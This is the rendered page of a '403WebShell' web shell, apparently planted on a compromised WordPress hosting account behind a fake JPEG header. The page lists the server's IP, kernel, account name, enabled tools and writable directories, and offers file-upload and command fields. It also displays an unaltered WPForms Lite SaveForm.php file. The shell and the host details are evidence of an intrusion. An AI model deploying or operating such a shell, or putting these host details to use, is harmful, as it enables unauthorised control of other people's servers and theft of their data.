????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.80.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/eaabusiness.com/wp-content/plugins/wpforms-lite/src/Admin/Builder/Ajax/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/eaabusiness.com/wp-content/plugins/wpforms-lite/src/Admin/Builder/Ajax/SaveForm.php
<?php

namespace WPForms\Admin\Builder\Ajax;

/**
 * Save the form data.
 *
 * @since 1.9.4
 */
class SaveForm {

	/**
	 * The form fields processing while saving the form.
	 *
	 * @since 1.9.4
	 *
	 * @param array $fields    Form fields data.
	 * @param array $form_data Form data.
	 *
	 * @return array
	 */
	public function process_fields( array $fields, array $form_data ): array {

		$form_obj = wpforms()->obj( 'form' );

		if ( ! $form_obj || empty( $fields ) || empty( $form_data['id'] ) ) {
			return $fields;
		}

		$saved_form_data = $form_obj->get( $form_data['id'], [ 'content_only' => true ] );

		foreach ( $fields as $field_id => $field_data ) {
			if ( empty( $field_data['type'] ) ) {
				continue;
			}

			/**
			 * Filter field settings before saving the form.
			 *
			 * @since 1.9.4
			 *
			 * @param array $field_data      Field data.
			 * @param array $form_data       Forms data.
			 * @param array $saved_form_data Saved form data.
			 */
			$fields[ $field_id ] = apply_filters( "wpforms_admin_builder_ajax_save_form_field_{$field_data['type']}", $field_data, $form_data, $saved_form_data );
		}

		return $fields;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit